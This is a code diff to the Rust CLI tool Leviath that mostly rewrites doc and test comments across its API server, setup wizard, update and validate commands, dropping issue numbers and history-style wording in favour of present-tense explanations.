-        // That stopped discriminating when it became optional so a bare call
-        // could list.
+        // The status cannot carry the proof: `path` is optional, so a bare
+        // call lists rather than refusing.
         let app = test_app();
         let req = Request::builder()
             .uri("/api/agents/some-run/files")
@@ -2036,7 +2035,7 @@ system_prompt = "Run"
 
     /// A browser preflight for a request carrying `Authorization` must be
     /// allowed. `Access-Control-Allow-Headers: *` does NOT cover `Authorization`
-    /// per the Fetch spec, so the header has to be listed explicitly — without
+    /// per the Fetch spec, so the header has to be listed explicitly - without
     /// it the console's authenticated requests are blocked by the browser. Also
     /// covers the `Some("*")` CORS arm.
     #[tokio::test]
@@ -2303,7 +2302,7 @@ system_prompt = "Run"
     /// The failure people actually hit: the default port is 3000, and 3000 is
     /// taken on a great many developer machines. Holds an ephemeral port for
     /// the duration so the collision is certain rather than hoped for, then
-    /// asserts the error names the flag that fixes it (issue #586).
+    /// asserts the error names the flag that fixes it.
     #[tokio::test]
     async fn execute_on_a_taken_port_names_the_port_flag() {
         let held = tokio::net::TcpListener::bind("127.0.0.1:0")

--- a/crates/leviath-cli/src/commands/serve/polling.rs
+++ b/crates/leviath-cli/src/commands/serve/polling.rs
@@ -151,13 +151,12 @@ fn handle_event(state: &AppState, client: &reqwest::Client, event: WorldEvent) {
 ///
 /// The engine has its own words for where a run stands - `idle` and `active`
 /// for a run that is going, `waiting` for one parked - and they arrive here on
-/// every [`WorldEvent`]. They used to go straight out on the socket, so
-/// `agent_status.status` and `GET /api/runs/{id}` described the same run in
-/// different words, and every client had to carry its own copy of the mapping
-/// between them to reconcile the two. One console's copy quietly normalized the
-/// engine's three words to nothing, which meant a status frame could never move
-/// a run: it heard a completion and a pause and nothing else, for months,
-/// because a 1.5s re-read of the run kept papering over it.
+/// every [`WorldEvent`]. Sending them straight out on the socket would make
+/// `agent_status.status` and `GET /api/runs/{id}` describe the same run in
+/// different words, leaving every client to carry its own copy of the mapping
+/// between them. A client whose copy is wrong sees status frames that never
+/// move a run - a completion and a pause and nothing else - and a periodic
+/// re-read of the run papers over it for months.
 ///
 /// So the translation happens once, here, on the way out. The engine keeps its
 /// vocabulary inside the engine; the API has one.
@@ -745,13 +744,11 @@ mod tests {
 
     /// The socket and the run have to say the same word for the same state.
     ///
-    /// The engine's `idle`, `active` and `waiting` used to go out verbatim, so
-    /// a client watching the socket saw three words no REST route ever sends
-    /// and had to carry its own copy of this mapping to reconcile them. One
-    /// console's copy normalized them to nothing, which meant a status frame
-    /// could never move a run - it heard completions and pauses and nothing
-    /// else - and that went unnoticed because a periodic re-read of the run
-    /// kept supplying the right answer.
+    /// The engine's `idle`, `active` and `waiting` must not reach a client
+    /// verbatim: they are three words no REST route sends, so a client would
+    /// have to carry its own copy of this mapping. A copy that normalizes them
+    /// to nothing leaves status frames unable to move a run - completions and
+    /// pauses and nothing else - and a periodic re-read of the run hides that.
     #[test]
     fn a_status_frame_speaks_the_run_status_vocabulary() {
         let word = |status: &str| {
@@ -806,10 +803,10 @@ mod tests {
         assert_eq!(json["status"], "complete");
     }
 
-    /// The fine-grained events used to arrive wrapped as `{"type":"world",
-    /// "event":{...}}`, so every field a client wanted sat one level down
-    /// behind a tag it had to know to unwrap. They are flat frames now, and
-    /// the fields are asserted by name because that shape is the contract.
+    /// The fine-grained events are flat frames, not `{"type":"world",
+    /// "event":{...}}` with every field a client wants one level down behind a
+    /// tag it has to know to unwrap. The fields are asserted by name because
+    /// that shape is the contract.
     #[test]
     fn stage_and_tool_frames_are_flat_and_named() {
         let json = serde_json::to_value(to_server_event(WorldEvent::StageTransition {
@@ -1208,7 +1205,7 @@ mod tests {
                     "delivery id in the header"
                 );
                 // A `complete` status alone would tell the receiver this run
-                // succeeded, when it finished with nothing to show (#192).
+                // succeeded, when it finished with nothing to show.
                 assert!(
                     requests[0].contains(r#""empty_output":true"#),
                     "the empty-run verdict travels with the completion"

--- a/crates/leviath-cli/src/commands/serve/runs.rs
+++ b/crates/leviath-cli/src/commands/serve/runs.rs
@@ -413,10 +413,9 @@ fn resolve(query: &RunsQuery) -> Result<Resolved, ApiError> {
 /// Every `Option` field is filled first. Several carry
 /// `skip_serializing_if = "Option::is_none"`, so a probe left at its defaults
 /// omits them and the allowlist silently refuses a field that does exist -
-/// `?fields=read_paths` and `?fields=final_output` were both rejected on runs
-/// that had them, and then `?fields=waiting_on` was, which is what the
-/// leviath.dev console asks for on every sidebar load (issue #656). Filling
-/// the options is what makes the sentence above true, and
+/// `?fields=waiting_on` on a parked run, say, which is what the leviath.dev
+/// console asks for on every sidebar load. Filling the options is what makes
+/// the sentence above true, and
 /// `every_skip_if_none_option_on_run_meta_is_filled_by_the_probe` in the tests
 /// reads the struct's source to catch the next one added without a line here.
 fn known_meta_fields() -> HashSet<String> {
@@ -590,8 +589,8 @@ fn paginate(runs: Vec<RunMeta>, resolved: &Resolved) -> (Vec<RunMeta>, Option<St
 /// The single place a `RunMeta` becomes JSON on any route. `redacted()` is what
 /// strips the webhook signing secret, and a redaction that has to be remembered
 /// per handler is the one that gets forgotten; the same goes for the spans,
-/// which are the reason `/api/runs` and `/api/agents` used to describe the same
-/// run with different keys.
+/// which are what keeps `/api/runs` and `/api/agents` describing the same run
+/// with the same keys.
 pub(super) fn run_json(meta: &RunMeta, now: i64) -> serde_json::Value {
     let mut value = serde_json::to_value(meta.redacted()).unwrap_or(serde_json::Value::Null);
     leviath_core::duration::annotate_spans(
@@ -751,7 +750,7 @@ fn remove_family(ids: &[String]) -> Result<(), (StatusCode, String)> {
 /// Separate from `DELETE /api/agents/{id}`, which cancels. The two verbs mean
 /// genuinely different things - one stops the work, the other forgets it
 /// happened - and answering 204 to both would leave a client unable to say
-/// which it got (issue #463).
+/// which it got.
 ///
 /// The deletion is real: the directory and everything in it, including the
 /// transcript. That is the point of the route. A console that offered a

--- a/crates/leviath-cli/src/commands/serve/runs_tests.rs
+++ b/crates/leviath-cli/src/commands/serve/runs_tests.rs
@@ -178,7 +178,7 @@ fn fields_accepts_the_optional_ones_that_only_some_runs_carry() {
 /// list exists is the struct itself. So read it: every `pub` field declared
 /// inside `RunMeta` in `run_meta.rs` must be a key the probe serializes. A
 /// field added with `skip_serializing_if` and no line in `probe_meta` fails
-/// here rather than as a 400 in a console (issue #656 was `waiting_on`).
+/// here rather than as a 400 in a console.
 #[test]
 fn every_skip_if_none_option_on_run_meta_is_filled_by_the_probe() {
     let source = std::fs::read_to_string(concat!(

--- a/crates/leviath-cli/src/commands/serve/scripts_tests.rs
+++ b/crates/leviath-cli/src/commands/serve/scripts_tests.rs
@@ -299,9 +299,9 @@ async fn a_traversing_agent_name_is_refused() {
 }
 
 /// An agent the catalog found through `config.agent_paths` resolves to its
-/// own directory, the one `GET /api/blueprints` reports as `path`. It used to
-/// resolve to `~/.leviath/agents/<name>`, which for such an agent does not
-/// exist, so a `PUT` wrote a tool nothing would ever load (issue #643).
+/// own directory, the one `GET /api/blueprints` reports as `path`. Resolving
+/// to `~/.leviath/agents/<name>` instead would write the tool into a directory
+/// that does not exist for such an agent, where nothing would ever load it.
 #[tokio::test]
 async fn an_agent_from_a_configured_path_resolves_to_its_own_directory() {
     with_home(|home| async move {
@@ -1184,8 +1184,8 @@ async fn validating_a_provider_does_not_run_initialize() {
 
 /// The whole round trip for an agent that lives in a configured path rather
 /// than the installed directory: its tools are listed, its hook opens, and a
-/// write lands beside its manifest. Every one of these went to an empty
-/// `~/.leviath/agents/<name>/` before (issue #643).
+/// write lands beside its manifest, rather than in an empty
+/// `~/.leviath/agents/<name>/`.
 #[tokio::test]
 async fn the_routes_see_an_agent_discovered_through_agent_paths() {
     with_home(|home| async move {

--- a/crates/leviath-cli/src/commands/serve/tls.rs
+++ b/crates/leviath-cli/src/commands/serve/tls.rs
@@ -1,4 +1,4 @@
-//! Serving the API over HTTPS (issue #300).
+//! Serving the API over HTTPS.
 //!
 //! # Why this exists at all
 //!

--- a/crates/leviath-cli/src/commands/serve/tools.rs
+++ b/crates/leviath-cli/src/commands/serve/tools.rs
@@ -24,12 +24,12 @@ use crate::tool_inventory::ToolInventory;
 ///
 /// The name is looked up in the same catalog `GET /api/blueprints` lists, so an
 /// agent found through `config.agent_paths` resolves to where it actually is.
-/// It used to be `agents_dir().join(name)` unconditionally: an agent under
-/// development in a configured path was listed and could be spawned, yet its
-/// `tools/` never showed up here, its hooks could not be opened, and a
-/// `PUT /api/scripts/...?agent=` wrote into an empty `~/.leviath/agents/<name>/`
-/// nothing would load (issue #643). A name the catalog does not know still
-/// falls back to the installed directory, so a new agent can be created there.
+/// A plain `agents_dir().join(name)` would point every caller at
+/// `~/.leviath/agents/<name>/` instead: an agent under development in a
+/// configured path is listed and can be spawned, but its `tools/` and hooks
+/// live beside it, and a `PUT /api/scripts/...?agent=` would write into an
+/// empty directory nothing loads. A name the catalog does not know still falls
+/// back to the installed directory, so a new agent can be created there.
 ///
 /// The same gate, on the same directory, that `blueprint_dir` applies in
 /// `blueprints.rs`: `Path::join` neither normalizes `..` nor resists an
@@ -285,9 +285,8 @@ mod tests {
     }
 
     /// An agent listed because its directory is under `config.agent_paths`
-    /// resolves to that directory, not to an empty `~/.leviath/agents/<name>`.
-    /// The catalog and the tools route used to disagree about where such an
-    /// agent lived, so its own `tools/` never appeared (issue #643).
+    /// resolves to that directory, not to an empty `~/.leviath/agents/<name>`,
+    /// so the `tools/` beside it are the ones listed.
     #[tokio::test]
     async fn an_agent_from_a_configured_path_lists_its_own_tools() {
         with_home(|home| async move {

--- a/crates/leviath-cli/src/commands/serve/tree.rs
+++ b/crates/leviath-cli/src/commands/serve/tree.rs
@@ -286,7 +286,6 @@ mod tests {
             make_meta("c1", "b", Some("r")),
             make_meta("c2", "c", Some("r")),
         ];
-        // Build from a specific parent
         let subtree = build_tree(&runs, Some("r"));
         assert_eq!(subtree.len(), 2);
     }

--- a/crates/leviath-cli/src/commands/serve/types.rs
+++ b/crates/leviath-cli/src/commands/serve/types.rs
@@ -125,13 +125,13 @@ pub struct ServeArgs {
 pub(crate) struct AppState {
     /// Where the config comes from, rather than a copy of it.
     ///
-    /// A snapshot taken at start-up was wrong in both directions: an edit made
-    /// through `PUT /api/config` was written to disk and never read back, so
-    /// reloading the page showed the old value and the edit read as lost; and
-    /// an edit made anywhere else - `lev setup`, an editor, the daemon's own
-    /// config - was invisible for the life of the process. `lev serve` is a
-    /// separate process from `lev daemon`, so restarting the daemon did not
-    /// help either (issue #532).
+    /// A snapshot taken at start-up would be wrong in both directions: an edit
+    /// made through `PUT /api/config` goes to disk, so a copy would keep
+    /// serving the superseded value and the edit would read as lost; and an
+    /// edit made anywhere else - `lev setup`, an editor, the daemon's own
+    /// config - would be invisible for the life of the process. `lev serve` is
+    /// a separate process from `lev daemon`, so restarting the daemon does not
+    /// help either.
     ///
     /// This is the same [`ConfigReloader`] the daemon uses for its spawn-time
     /// config: mtime-checked, last-good on a parse failure. Read it through
@@ -297,8 +297,7 @@ pub(super) fn unexpected_response(
 ///
 /// `success` when it did the thing; 404 carrying `not_found` when it could
 /// not, since every such request names a run or an interaction and "could
-/// not" means the daemon had nothing by that name in the right state. Five
-/// handlers used to carry this four-arm match each.
+/// not" means the daemon had nothing by that name in the right state.
 pub(super) fn daemon_ok(
     reply: std::io::Result<leviath_runtime::control_socket::ControlResponse>,
     success: axum::http::StatusCode,
@@ -527,8 +526,8 @@ pub(super) struct FanOutInfo {
 /// which is why this is a separate shape rather than an extra field on
 /// [`BlueprintInfo`].
 ///
-/// Flattened, so the detail route's JSON is what it always was plus
-/// `manifest`, and a client reading only the old fields is unaffected.
+/// Flattened, so the detail route's JSON is [`BlueprintInfo`]'s own fields
+/// plus `manifest`, and a client that reads only those is unaffected.
 #[derive(Debug, Serialize)]
 pub(super) struct BlueprintDetail {
     #[serde(flatten)]
@@ -708,16 +707,14 @@ pub(super) struct ListAgentsQuery {
 /// Does `filter` name this run's status?
 ///
 /// `RunStatus` reaches a client two different ways: `Json<RunMeta>` serializes
-/// it through serde, which is `snake_case` (`waiting_input`), while the status
-/// filter compared it through `Display`, which is PascalCase, lowercased
-/// (`waitinginput`). So a client that took a status out of one response and fed
-/// it back as a filter got nothing, on exactly the two multi-word variants where
-/// it is least obvious why.
+/// it through serde, which is `snake_case` (`waiting_input`), while `Display`
+/// is PascalCase, lowercased (`waitinginput`). Comparing against either
+/// spelling alone leaves a client that takes a status out of one response and
+/// feeds it back as a filter with nothing, on exactly the two multi-word
+/// variants where it is least obvious why.
 ///
 /// Normalizing both sides - lowercase, and drop `_` and `-` - accepts every
-/// spelling of the same status, including the two that already worked. That
-/// makes this strictly wider than the old comparison, so nothing a client does
-/// today can start failing.
+/// spelling of the same status.
 pub(super) fn status_matches(status: &crate::runstate::RunStatus, filter: &str) -> bool {
     fn normalize(s: &str) -> String {
         s.chars()
@@ -872,18 +869,17 @@ pub(super) enum FileOrListing {
 
 /// Response of `GET /api/agents/{id}/stages`: the run's per-stage ledger.
 ///
-/// The one thing the runtime records per run that no route served. Everything
-/// here is already on disk in `stages.json` and already read by `lev stages`;
-/// a client over HTTP had to reconstruct the interesting part by diffing
-/// `context/history` snapshots, which is expensive and cannot see a stage that
-/// ran and wrote nothing (#388).
+/// Everything here is already on disk in `stages.json` and already read by
+/// `lev stages`. Without this route a client over HTTP has to reconstruct the
+/// interesting part by diffing `context/history` snapshots, which is expensive
+/// and cannot see a stage that ran and wrote nothing.
 ///
 /// Each record carries a price as well as a token count, and a split of both by
 /// each stay in the stage. Pricing stays on this side deliberately: `cost_usd`
 /// is `None` for unknown rather than zero and `cost_is_exact` says whether the
 /// figure is the invoice or a reconstruction of it, and a console multiplying
 /// tokens by a rate card of its own would produce a fourth answer that
-/// disagrees with all three (#630).
+/// disagrees with all three.
 ///
 /// Not paginated. The list is bounded by the blueprint's stage count - a dozen
 /// at the top end - so a cursor would be ceremony over a short array. The

--- a/crates/leviath-cli/src/commands/serve/update.rs
+++ b/crates/leviath-cli/src/commands/serve/update.rs
@@ -18,12 +18,11 @@ use crate::commands::update::{UpdateArgs, UpdateEnv, plan, plan_json};
 /// `GET /api/update`: how this copy was installed, and the command that
 /// upgrades it.
 ///
-/// Exists because the browser console had no way to ask. It printed a single
-/// hard-coded `brew upgrade leviath` at anyone whose Leviath was out of date,
-/// which is an instruction a Windows user cannot carry out and has no
-/// alternative offered for (issue #588) - while `lev update` on the very same
-/// binary already knew to say `scoop update leviath`, or to re-run
-/// `install.ps1`, or that a `cargo install` copy is theirs to rebuild.
+/// Exists so a browser console never has to guess. A hard-coded
+/// `brew upgrade leviath` is an instruction a Windows user cannot carry out
+/// and has no alternative offered for, while `lev update` on the very same
+/// binary knows to say `scoop update leviath`, or to re-run `install.ps1`, or
+/// that a `cargo install` copy is theirs to rebuild.
 ///
 /// Read-only, and so not behind `--allow-admin`: [`plan`] works out what the
 /// command *would* do and does none of it, the environment it is handed cannot
@@ -303,7 +302,7 @@ mod tests {
     /// Absent keys and `null` keys are different things to a client: `null` is
     /// "cannot tell", which it already knows how to render, while a missing key
     /// is indistinguishable from an older daemon and sends it back to guessing
-    /// from the outside, which is what issue #600 is about.
+    /// from the outside.
     #[tokio::test]
     async fn the_update_check_fields_are_always_present_even_when_unanswered() {
         let app = Router::new()

--- a/crates/leviath-cli/src/commands/serve/update_cache.rs
+++ b/crates/leviath-cli/src/commands/serve/update_cache.rs
@@ -4,7 +4,7 @@
 //! a network call, so the answer it gives is whatever the last lookup found. The
 //! lookup itself is [`crate::commands::update::latest`], the same code
 //! `lev update` runs, so the console and the terminal cannot come to different
-//! conclusions about the same binary (issue #600).
+//! conclusions about the same binary.
 
 use std::sync::{Arc, Mutex, PoisonError};
 
@@ -13,10 +13,7 @@ use crate::commands::update::latest::{self, LatestCheck, ReleaseFetcher};
 /// The last answer, and how to get a new one.
 ///
 /// Carried on the app state rather than in a `static` so that two tests, or two
-/// servers in one process, cannot write into each other's answer. The first
-/// version of this was a global and the tests found it immediately: one stored a
-/// version and another read it back, which is the same failure a second `lev
-/// serve` in-process would have hit.
+/// servers in one process, cannot write into each other's answer.
 #[derive(Clone)]
 pub(super) struct UpdateCheckCache {
     last: Arc<Mutex<LatestCheck>>,

--- a/crates/leviath-cli/src/commands/serve/update_job.rs
+++ b/crates/leviath-cli/src/commands/serve/update_job.rs
@@ -4,7 +4,7 @@
 //! the half that does it: it runs `binary.commands`, installs the blueprints the
 //! plan marks `preselected`, and applies the config migrations - the same three
 //! steps `lev update` runs, from the same [`plan`], so the console and the
-//! terminal cannot carry out different updates (issue #638).
+//! terminal cannot carry out different updates.
 //!
 //! # Why it is a job rather than a request
 //!

--- a/crates/leviath-cli/src/commands/serve/websocket.rs
+++ b/crates/leviath-cli/src/commands/serve/websocket.rs
@@ -104,10 +104,10 @@ async fn handle_ws(
 /// deadline injected so tests can drive the dead-peer branches without real
 /// multi-second waits.
 ///
-/// The `select!` is deliberately **unbiased**: the old `biased;` variant
-/// polled the event branch first every iteration, so under a busy run the
-/// inbound half (`socket.recv()` - the only place Close frames and pongs are
-/// seen) could be starved indefinitely.
+/// The `select!` is deliberately **unbiased**: a `biased;` here would poll the
+/// event branch first every iteration, so under a busy run the inbound half
+/// (`socket.recv()` - the only place Close frames and pongs are seen) could be
+/// starved indefinitely.
 async fn handle_ws_with(
     mut socket: WebSocket,
     mut rx: broadcast::Receiver<ServerEvent>,
@@ -442,7 +442,7 @@ mod tests {
                 .expect("the first ping arrives");
         assert_eq!(first, 0x9, "only pings flow on an idle channel");
         // ...and goes unanswered. Reaching a second ping at all is the
-        // assertion: the old code broke the loop instead of sending it.
+        // assertion: one missed pong must not end the loop.
         let (second, payload) =
             tokio::time::timeout(std::time::Duration::from_secs(30), client.recv_frame())
                 .await

--- a/crates/leviath-cli/src/commands/setup/catalog.rs
+++ b/crates/leviath-cli/src/commands/setup/catalog.rs
@@ -177,9 +177,9 @@ pub const OLLAMA_MAX_CONCURRENT_INFERENCES: usize = 1;
 
 /// Read a provider's currently-configured credential out of a config.
 ///
-/// Note `openrouter_api_key` and `ollama_base_url` sit at the top level of
-/// `Config` while the other three live under `[providers]` - a historical split
-/// this function hides from everything else.
+/// `openrouter_api_key` and `ollama_base_url` sit at the top level of `Config`
+/// while the other three live under `[providers]` - a legacy split this
+/// function hides from everything else.
 pub(crate) fn stored_credential(config: &Config, id: &str) -> Option<String> {
     match id {
         "anthropic" => config.providers.anthropic_api_key.clone(),
@@ -428,8 +428,7 @@ mod tests {
 
     #[test]
     fn redact_counts_characters_not_bytes() {
-        // Issue #115: a byte-based cut lands inside a multi-byte character and
-        // panics.
+        // A byte-based cut lands inside a multi-byte character and panics.
         assert_eq!(redact("日本語日本語日本語"), "****語日本語");
         // 3 characters but 9 bytes - a byte-length guard would call this "long"
         // and print the whole key.

--- a/crates/leviath-cli/src/commands/setup/input/tests.rs
+++ b/crates/leviath-cli/src/commands/setup/input/tests.rs
@@ -992,7 +992,7 @@ fn clicking_the_button_advances_the_step() {
     assert_ne!(w.step, Step::Agents, "the button is a button when clicked");
 }
 
-/// The two actions that used to be shortcut keys and nothing else.
+/// Both credential-screen actions are clickable rows, not shortcut keys alone.
 #[test]
 fn the_credential_screen_offers_its_actions_as_clickable_rows() {
     let (_dir, mut w) = wizard();

--- a/crates/leviath-cli/src/commands/setup/render.rs
+++ b/crates/leviath-cli/src/commands/setup/render.rs
@@ -8,9 +8,9 @@
 //!
 //! Every step builds a `Screen`: flat lines, plus the line each selectable
 //! row starts on. That shape is what makes the wizard survive a small window.
-//! The screens used to be `List`s of pre-sized items and assumed the terminal
-//! was tall enough, so the tuning screen's thirteen fields simply stopped at
-//! whatever row ran out of pane, with nothing on screen to say more existed.
+//! A `List` of pre-sized items assumes the terminal is tall enough, so the
+//! tuning screen's thirteen fields would stop at whatever row ran out of pane,
+//! with nothing on screen to say more existed.
 //! Wrapping happens here too, in `wrap_line`, for the same reason: the
 //! number of rows a screen occupies is only knowable once its text is wrapped,
 //! and without that number there is nothing to scroll against.
@@ -1151,9 +1151,9 @@ mod tests {
     }
 
     /// The tuning screen has thirteen two-line fields, which is more than most
-    /// windows are tall. It used to render as a `List` that simply stopped at
-    /// the bottom of the pane, so the last fields and the Continue button were
-    /// unreachable with no sign they existed.
+    /// windows are tall. Drawn as a `List` it would stop at the bottom of the
+    /// pane, leaving the last fields and the Continue button unreachable with
+    /// no sign they existed.
     #[test]
     fn a_short_window_can_still_reach_the_last_field_and_the_button() {
         let (_dir, mut w) = wizard();

--- a/crates/leviath-cli/src/commands/setup/state/mod.rs
+++ b/crates/leviath-cli/src/commands/setup/state/mod.rs
@@ -751,11 +751,10 @@ impl Wizard {
 
     /// The model field's "no default" option.
     ///
-    /// It read "(provider default)", which is a thing that does not exist: no
-    /// provider default model is consulted anywhere at run time. A stage that
-    /// names no model of its own falls back to a model built into Leviath, not
-    /// to anything your provider chose, so the old label promised a mechanism
-    /// and delivered the opposite of what it said.
+    /// Worded as the blueprint's decision, never as a "provider default":
+    /// no provider default model is consulted anywhere at run time. A stage
+    /// that names no model of its own falls back to a model built into
+    /// Leviath, not to anything the provider chose.
     pub const NO_DEFAULT_MODEL: &'static str = "(each blueprint decides)";
 
     /// Open the chooser for the Defaults field the cursor is on.

--- a/crates/leviath-cli/src/commands/test.rs
+++ b/crates/leviath-cli/src/commands/test.rs
@@ -881,9 +881,10 @@ max_tokens = 500
     #[test]
     fn truncate_str_unicode() {
         assert_eq!(truncate_str("abcde", 3), "abc...");
-        // Issue #115: the cut lands inside a multi-byte character. This used to
-        // panic ("byte index N is not a char boundary") on the assertion-failure
-        // path, which prints raw model output. '🎉' occupies bytes 3..7.
+        // The cut lands inside a multi-byte character, where a byte-indexed
+        // slice panics ("byte index N is not a char boundary") on the
+        // assertion-failure path, which prints raw model output. '🎉' occupies
+        // bytes 3..7.
         assert_eq!(truncate_str("abc🎉def", 4), "abc...");
         assert_eq!(truncate_str("abc🎉def", 6), "abc...");
         // A boundary-aligned cut is unaffected.

--- a/crates/leviath-cli/src/commands/update.rs
+++ b/crates/leviath-cli/src/commands/update.rs
@@ -708,8 +708,7 @@ fn decline_update_check(_: &str) -> Result<String, String> {
 ///
 /// A copy whose channel could not be worked out is not asked about: the answer
 /// would be the stable release compared against a build that may not be on that
-/// line at all, which is exactly the wrong-in-both-directions guess the console
-/// was making before any of this (issue #600).
+/// line at all, which is a guess that can be wrong in both directions.
 fn check_latest(plan: &UpdatePlan, env: &UpdateEnv, version: &str) -> latest::LatestCheck {
     match plan.method.channel() {
         Some(channel) => latest::check_with(channel, version, &env.latest, latest::now_secs()),

--- a/crates/leviath-cli/src/commands/update/detect.rs
+++ b/crates/leviath-cli/src/commands/update/detect.rs
@@ -251,9 +251,9 @@ pub(super) fn is_ambiguous_prefix(prefix: &Path) -> bool {
 
 /// What `brew --prefix` says, when there is a `brew` to ask.
 ///
-/// Cached: this used to run once per `lev update`, and now also answers an HTTP
-/// route, where spawning a process per request to learn a thing that cannot
-/// change under a running server would be a waste worth noticing.
+/// Cached: this also answers an HTTP route, where spawning a process per
+/// request to learn a thing that cannot change under a running server would be
+/// a waste worth noticing.
 pub(crate) fn brew_prefix() -> Option<PathBuf> {
     static CACHED: std::sync::OnceLock<Option<PathBuf>> = std::sync::OnceLock::new();
     CACHED

--- a/crates/leviath-cli/src/commands/update/latest.rs
+++ b/crates/leviath-cli/src/commands/update/latest.rs
@@ -1,22 +1,22 @@
-//! "Is there anything newer?" - the question `GET /api/update` could not answer.
+//! "Is there anything newer?" - the question `GET /api/update` cannot answer on
+//! its own.
 //!
 //! [`crate::commands::update::plan`] works out *how* this copy would update and
 //! deliberately makes no network call, so the route built on it can say what to
-//! type and not whether it is worth typing. The console was left comparing the
-//! daemon's version against a number baked into the site at deploy time, which
-//! only knows the stable channel and is as stale as the last build - so the
-//! people most likely to want an update prompt, the ones on `alpha` and `beta`,
-//! are exactly the ones it has to stay silent for (issue #600).
+//! type and not whether it is worth typing. Without this, a console is left
+//! comparing the daemon's version against a number baked into the site at
+//! deploy time, which only knows the stable channel and is as stale as the last
+//! build - so the people most likely to want an update prompt, the ones on
+//! `alpha` and `beta`, are exactly the ones it has to stay silent for.
 //!
 //! The answer comes from the GitHub releases this repo already publishes, one
 //! tag per channel, rather than from the package manager that would install it.
 //! Asking `brew` and `scoop` is the more obvious "forward to the right place",
-//! and it was the first plan here: it fails on the half of the problem that
-//! matters. Their output is a text format per tool per platform, a `cargo
-//! install` copy has nothing to ask at all, and the install script leaves no
-//! record - so Scoop and Windows would answer `null`, which is the gap that
-//! started this. One publish point answers for every channel, on every platform,
-//! for every install method.
+//! and it fails on the half of the problem that matters: their output is a text
+//! format per tool per platform, a `cargo install` copy has nothing to ask at
+//! all, and the install script leaves no record - so Scoop and Windows would
+//! answer `null`. One publish point answers for every channel, on every
+//! platform, for every install method.
 
 use std::sync::Arc;
 use std::time::{SystemTime, UNIX_EPOCH};

--- a/crates/leviath-cli/src/commands/validate.rs
+++ b/crates/leviath-cli/src/commands/validate.rs
@@ -47,7 +47,7 @@ pub(crate) struct BlueprintSummary {
     pub stages: Vec<String>,
     /// Whether `lev run <agent> --task <text>` is accepted. False means a run
     /// handing this agent a task is refused at spawn, so a harness can check
-    /// here instead of discovering it from the run-time error (issue #414).
+    /// here instead of discovering it from the run-time error.
     pub accepts_task: bool,
     /// Every caller-settable input, in declaration order: which flag seeds
     /// which region, and whether a run can start without it.
@@ -91,7 +91,7 @@ fn input_summaries(blueprint: &leviath_core::Blueprint) -> Vec<InputSummary> {
 }
 
 /// The "Inputs:" lines `print_success` shows, answering at validate time what
-/// `lev run` would otherwise only reveal by refusing at spawn (issue #414):
+/// `lev run` would otherwise only reveal by refusing at spawn:
 /// which flags this agent takes, and explicitly that `--task` is not among
 /// them when no region is seeded from the task.
 fn input_lines(blueprint: &leviath_core::Blueprint) -> Vec<String> {
@@ -297,13 +297,11 @@ fn print_success(blueprint: &leviath_core::Blueprint) {
         println!("{line}");
     }
 
-    // Check if graph mode
     let is_graph = blueprint.stages.iter().any(|s| s.transitions.is_some());
     if is_graph {
         let entry = blueprint.resolve_entry_stage_name();
         println!("  Graph mode: entry stage '{}'", entry);
 
-        // List stages and their transitions
         for stage in &blueprint.stages {
             let transitions_info = match &stage.transitions {
                 Some(t) if !t.is_empty() => {
@@ -864,11 +862,10 @@ fn broken_config_note(fault: &crate::config::ConfigFault) -> Vec<String> {
 
 /// Run `lev validate`: check a blueprint and print what is wrong with it.
 pub(crate) async fn execute(args: ValidateArgs) -> anyhow::Result<()> {
-    // A config that will not load used to be swallowed whole here: `.ok()`
-    // turned it into `None`, and the checks that need a config - which models
-    // an install would use, which read paths are granted - quietly stopped
-    // running. The blueprint still validates without one, so this stays a
-    // warning rather than a refusal, but it is said out loud now.
+    // A config that will not load is said out loud. `.ok()` here would turn it
+    // into `None` and quietly stop the checks that need a config - which models
+    // an install would use, which read paths are granted. The blueprint still
+    // validates without one, so this is a warning rather than a refusal.
     let config = match crate::config::Config::load_faulted() {
         Ok(config) => Some(config),
         Err(fault) => {
@@ -926,9 +923,9 @@ mod tests {
     /// against the blueprint's own order - and only when they differ, because
     /// repeating the list under a stage that got its first choice is noise.
     /// A blueprint leading with a model nothing configured serves falls through
-    /// to the next one, and the listing says so. This is the surviving reason
-    /// for a substitution: #578 removed the other one, where preferring a
-    /// provider silently changed which model ran.
+    /// to the next one, and the listing says so. That fallthrough is the only
+    /// thing that substitutes: `default_provider` chooses between routes to a
+    /// model, never between models.
     #[test]
     fn model_resolution_explains_falling_through_to_the_next_model() {
         let manifest = r#"
@@ -1091,11 +1088,10 @@ system_prompt = "hi"
             "no substitution, so nothing to explain: {lines:#?}"
         );
 
-        // Preferring openrouter no longer substitutes a different MODEL. The
+        // Preferring openrouter does not substitute a different MODEL. The
         // blueprint asked for claude-sonnet-5 first and a route to it exists,
         // so that is what runs: `default_provider` chooses between routes to a
-        // model, not between models (#578). Before this, the second-listed
-        // entry was promoted and the run silently went to deepseek.
+        // model, not between models.
         let openrouter_first = with_keys("openrouter");
         let registry = registry_for(&openrouter_first);
         let lines = model_resolution_lines(blueprint, &openrouter_first, &registry);
@@ -1372,8 +1368,8 @@ focus = { kind = "pinned", max_tokens = 500, seed = "input" }
 conversation = { kind = "sliding_window", max_items = 50, max_tokens = 10000 }
 "#;
 
-    /// The point of issue #414: validate now says what `lev run` would accept,
-    /// including that `--task` is not among the flags.
+    /// Validate says what `lev run` would accept, including that `--task` is
+    /// not among the flags.
     #[test]
     fn input_lines_name_every_flag_and_the_missing_task() {
         let lines = input_lines(&parse(NAMED_INPUTS_MANIFEST));
@@ -1569,11 +1565,10 @@ system = { kind = "pinned", max_tokens = 1000 }
             "validate-deny-warnings",
             |cfg_dir| async move {
                 // A key, so the blueprint's Anthropic entry is a reachable
-                // provider. This used to ride on Ollama registering without a
-                // credential; it now registers only when something answers at its
-                // address, so on a machine with no local Ollama the manifest also
-                // warned that nothing in its list was reachable - and the count
-                // this test is about went from one to two.
+                // provider. Ollama registers only when something answers at its
+                // address, so without this key a machine with no local Ollama
+                // draws a second warning that nothing in the list is reachable,
+                // and the count this test is about becomes two.
                 std::fs::write(
                     cfg_dir.join("config.toml"),
                     "[providers]\nanthropic_api_key = \"test-key\"\n",
@@ -1773,8 +1768,8 @@ system = { kind = "pinned", max_tokens = 1000 }
         assert_eq!(value["findings"][0]["severity"], serde_json::json!("error"));
     }
 
-    /// The JSON half of issue #414: a harness reads the accepted inputs off
-    /// the report instead of parsing the run-time refusal.
+    /// A harness reads the accepted inputs off the JSON report instead of
+    /// parsing the run-time refusal.
     #[test]
     fn json_report_names_the_accepted_inputs() {
         let blueprint = parse(NAMED_INPUTS_MANIFEST);
